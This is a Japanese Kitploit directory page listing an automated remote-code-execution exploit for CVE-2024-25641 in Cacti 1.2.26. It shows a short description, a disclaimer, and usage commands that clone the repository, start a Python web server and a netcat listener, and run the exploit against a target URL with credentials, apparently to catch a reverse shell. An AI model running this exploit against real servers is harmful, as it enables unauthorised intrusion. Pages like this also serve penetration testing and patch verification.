Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26 — CVE-2024-25641 - RCE自動エクスプロイト - Cacti 1.2.26 | Kitploit
ツール/GitHubGitHub/leo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubleo-mitch/cve-2024-25641-rce-automated-exploit-cacti-1.2.26

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 - RCE自動エクスプロイト - Cacti 1.2.26

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1011年前未レビュー

CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

CVE-2024-25641 向けの完全自動化エクスプロイト。 ユーザーが認証されている場合、Cacti バージョン 1.2.26 は任意ファイル書き込みの脆弱性(「パッケージインポート」機能を介して悪用可能)に対して脆弱であり、 「Import Templates」権限を持つ認証済みユーザーが Web サーバー上で任意の PHP コードを実行(RCE)できるようになります。

この PoC のクレジット: https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (私はこれを単に自動化して足がかりを得ました。)

免責事項

このツールは教育およびテスト目的のみを意図しています。このツールの作者は、これを使用して行われた誤用や違法行為に対して一切の責任を負いません。 このツールは、自分が所有するシステム、またはテストする明示的な許可があるシステムでのみ使用してください。 コンピュータシステムへの不正アクセスは違法かつ非倫理的です。

使用例

root@kitploit:~
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>

こちらもご確認ください: CVE-2024-25641 PoC

ツールをダウンロード